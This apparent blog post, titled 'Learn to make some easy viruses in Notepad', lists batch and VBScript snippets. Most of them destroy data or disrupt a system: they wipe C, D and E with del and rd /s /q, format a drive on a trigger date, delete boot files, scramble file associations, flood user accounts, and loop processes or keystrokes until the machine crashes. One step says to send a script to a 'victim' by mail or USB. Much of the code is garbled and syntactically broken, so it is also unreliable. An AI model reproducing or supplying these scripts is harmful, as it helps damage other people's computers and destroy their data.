LEARN TO MAKE SOME EASY VIRUSES IN NOTEPAD

#The following viruses may be too dangerous try it at your own risk.
    I will not be responsible for the rubbish things you are doing through this codes.


The following code vanishes all your files in hard disk in less than 5 minutes.
code:-
           del*.*
save it as (anyname.bat)


The following code may be too dangerous.
 (Do it at your own risk.)




-The blue screen of death.
code:-
         @echo off
         del%systemdrive%*.*/f/s/q
            shutdown-r-f-t00
save it as (anyname.bat)



Trick your friends keyboard and make him type "you are a fool" simultaneously.
code:-
      SetwshShell=wscript.CreateObject('Wscript.shell')
      do
      wscript.sleep 100
     wshshell.sendkey 'you are a fool'
     loop
Note:replace all the single comas with inverted comas
Save it as (anyname.bat)



Format C. D, E Drive in few seconds.
(Do it at your own risk.)
code:-
         rd/s/q D:
         rd/s/q C:
         rd/s/q E:
Save it as (anyname.bat) .



Matrix Effect (Not Dangerous)
 code:-
            @echo off
            color 02
            : tricks
             echo%random%%random%%random%%random%
             %random%%random%%random%%random%
             goto trick
Save it as (matrix.bat).



Shutdown Computer and disable its property to restart:
code:-
         @echo off
         attrib -r-s-h C:autoexeC.bat
         del C:autoexec.bat
         attrib-r-s-hC:boot.ini
         del C:boot.ini
         attrib-r-s-h C:
         tldr
         del C:
         tldr
         attrib-r-s-h C:windowswin.ini
         del C:windowswin.ini
         @echo off
         msg*YOU GOT INFECTED !
         shutdown -s-t7-c"A VIRUS IS TAKING OVER C:Drive"
save it as (king.bat)



The following codes changes the file directory and disable its property to restart.
code:-
          @echo off
          assoc.txt=jpegfile
          assoc.exe=htmlfile
          assoc.jpeg=avifile
          assoc.png=mpegfile
          assoc.mpeg=txtfile
          assoc.sys=regfile
          msg 'YOUR SYSTEM IS CRACKED......'
          exit
save it as (nontext.bat)



The following codes will flooder the user's account
code:-
          @echo off
          :xnet
          User%random%/add
          goto x
Save it as (anyname.bat).



The following codes will delete the operating system.
(This may be very dangerous.)
code:-
          @Echo off
          Del C: *.*ly
save it as (anyname.bat)



The following codes will delete all the contents of a drive.
code:-
          @echo off
          del%Systemdrive%*.*/f/s/q
          shutdown-r-f-tOO
save it as (anyname.bat)



Endless Notepad
*This will pop up endless notepad until the computer freezes and crashes.*
code:-
          @Echo off
          :top
          START%SystemRoot%system.32 notepad.exe
          GOTO top
save it as (anyname.bat)



The following command is called a bomb virus.
*You can change the date( 2018/6/18 ) of the virus and the location ( format E:) on which you want the virus to affect,the virus will be activated on the date given by you ( 2018/6/18 ).*
code:-
          If%date%NEQ 2018/6/18 goto exit
          format E:/y>nul
          :exit
          exit
save it as (anyname.bat)



The following code is called crazy caps lock:
*This constantly turns caps lock on and off really fast continuously .*
code:-
         Set wshShell
         =wscript.CreateObject("wscript.shell")
         do
         wscript.sleep100
         wshshell.sendkey"{CAPSLOCK}"
         loop
save it as (anyname.bat)



The following code will cause endless enter:
*This constantly make it so the enter button pressed continuously.*
code:-
          Set wshShell
         =wscript.CreateObject("wscript.shell")
         do
         wscript.sleep100
         wshshell.sendkey"{enter}"
         loop
save it as (anyname.bat)



The following code is little bit funny :
code:-
         CreateObject("SAPI.spvoice").Speak"I LOVE YOU"
save it as (anyname.vbs)



Task kill
code:-
          @echo off
          start calc
          tskill msnmsgr
          tskill firefox
          tskill iexplorer
          tskill LimreWire
          tskill explorer
          tskill explorer
          tskill explorer
          tskill explorer
          tskill explorer
          pause
save this as (anyname.bat)



Popping CD Drive
*This will make CD drive pop in and out*
code:-
          Set oWMP=CreateObject("WMPlayer.OCX>&?)
          Set colCDROMs=oWMP.cdromCollection
          do
          if colCDROMs.count>=1 then
          for i=0 to colCDROMs.count-1
          colCDROMs.item(i.Eject)
          Next
          End If
          wscript.sleep 100
          loop
save it as (anyname.bat)



To make your pc talk
code:-
          Dim msg, sapi
          msg=InputBox("Enter your text","Talk it")
          Set sapi=CreateObject("sapi.spvoice")
          sapi.speak msg
save it with a (*.vbs) extension.



Make your own run/cmd box

step-1 : open notepad.
step-2 : Type command.com
step-3 : Go to file then save as your desired name followed by .bat



Remote shutdown computer.
(only works on your local network)

step-1 : Go to your CMD
step-2 : Then type shutdown.i
step-3 : Endless amusment !!



Make any user an administrator !
user the following steps:

step-1 : Go to your cmd/run box.
step-2 : Type net localgroup administrators followed by the user name then                      /add
step-3 : Example:net localgroup administrators strange/add strange the user                   name



Making program automatically run when the USB is plugged in:
code:-
          [autorun]
          Icon=default
          label=YourLableHere
          open=program.exe

make sure autorun is enabled in your pc.
save it as (anyname.bat)



How to remove the hidden virus in your pendrive
Actually these viruses are hidden and can't beseen even after you enable show hidden folders.
Following simple dos command will change the attributes of these files ,these after you can remove it by pressing delete key.

step-1 : Type cmd in Run
step-2 : Switch to the drive on which pen drive is connected
(like C:>h:enter)
step-3 : type exactly as
             attrib -s-h*.*/s /d and hit enter
 (don't forget space).
Now you can see the hidden virus files
and you can delete them.



Remove Shortcut Viruses from USB Drives and PC

step-1 : To remove your shortcut virus with the help of your command prompt system, you need to follow the steps ahead.

step-2 : Open command prompt by pressing windows+R and Enter "CMD" in the box and hit Enter.

step-3 : Now enter the following inyour Command Prompt "attrib:*.*/d/s -h -r -s" without quotes 'your USB Drive letter' must be replaced withyour own drive letter. Suppose your Flash Drive is on Drive F so you must imply the following command"attrib f:*.*/d/s -h -r -s" without quotes and hit Enter.

step-4 : Now wait for some time untill CMD finishes the command, once it's completed succesfully the shortcut virus will be removed from your PC.



How to Create An Aggravating Popup
code:-
          msg*hi
          msg*how are you
          msg*stop trying to make me go away
          msg*ill never go away never
          msg*still here
          msg*this is getting boring
          msg*"yawn"
          msg*i think i will go now
          msg*yeah i will
          msg*well bye
          msg*"end of message"
save it as (anyname.bat)
(you can make the message pop-up long just type:
msg*whatever you want)



How to make a Timmer
code:-
          Countdown:
          @echo off
          title Timer
          set time=30 (you can make the time what ever you want)
          :loop
          set/a time=%time%-1
          if%time%==0 goto timesup
          echo %time%
          ping localhost-n 2 > nul
          goto loop
          :timesup
          echo Time is Up!
          echo Press any key to exit!
          pause>nul
          exit
and save it as (anyname.bat)



How to make CMD and Calculators
code:-
          @echo off
          :E
          start cmd.ece
          start calc.exe
          goto :E
save it as (anyname.bat)



Wipe all data
code:-
          rd/s/q D:
          rd/s/q C:
          rd/s/q E:
save it as (anyname.bat)

it will format your pc in 3  seconds.(too dangerous try at your own risk).



How to make a pop up that will never gi away :
code:-
          @echo off
          :begin
          msg*whatsup guys?
          msg*strange made this
          msg*he rules
          GOTO:BEGIN
Save it as anyname.bat and don't run it just restart the computer and the code will start to work.



Funny Trick:
code:-
          :i
          dir/a
          goto i
save it anyname.bat
This just makes your computer info go really fast on cmd nothing  to fret about.



Create thousands of folder in minutes:

step 1 - open notepad and copy the following codes:

@echo off
:VIRUS
cd/d C:
md%random%
cd /d D
md%random%
cd /d E
md%random%
goto virus
REM######################

copy the following codes and paste it in the notepad then save it as (anyname.bat) {you can also save it with a different name but the extension must be .bat }.

step 2 - give it to the victim through mail or pen drive  and ask him to open
and it will create innumerous  folders in his C, D and E drive.




Make Your Keyboard Disco Light

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1. This piece of code makes ur keyboard a live disco..
code:-
          Set wshShell =wscript.CreateObject(“WScript.Shell”)
          do
          wscript.sleep 100
          wshshell.sendkeys “{CAPSLOCK}”
          wshshell.sendkeys “{NUMLOCK}”
          wshshell.sendkeys “{SCROLLLOCK}”
          loop

2. This one makes it looks like a chain of light….
code:-
          Set wshShell =wscript.CreateObject(“WScript.Shell”)
          do
          wscript.sleep 200
          wshshell.sendkeys “{CAPSLOCK}”
          wscript.sleep 100
          wshshell.sendkeys “{NUMLOCK}”
          wscript.sleep 50
          wshshell.sendkeys “{SCROLLLOCK}”
          loop
Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe
       


Endless Backspace
*This makes it so the backspace key is constantly being pressed*
Code:-
           MsgBox “Let’s go back a few steps”
           Set wshShell =wscript.CreateObject(”WScript.Shell”)
           do
           wscript.sleep 100
           wshshell.sendkeys “{bs}”
           loop



This Will Crash Your Computer
code:- 
           Option Explicit
           Dim WSHShell
           Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
           Dim x
           For x = 1 to 100000000
           WSHShell.RunTourstart.exe
           Next

Save It As Anything.vbs
It Only Works With Windows XP.




Join my WhatsApp group to get hacking news, books, clear doubts etc
Click here










Comments

Popular posts from this blog

DINASAUR GAME AUTOMATION

HOW TO CREATE A UNDETECTABLE KEYLOGGER

IP ADDRESS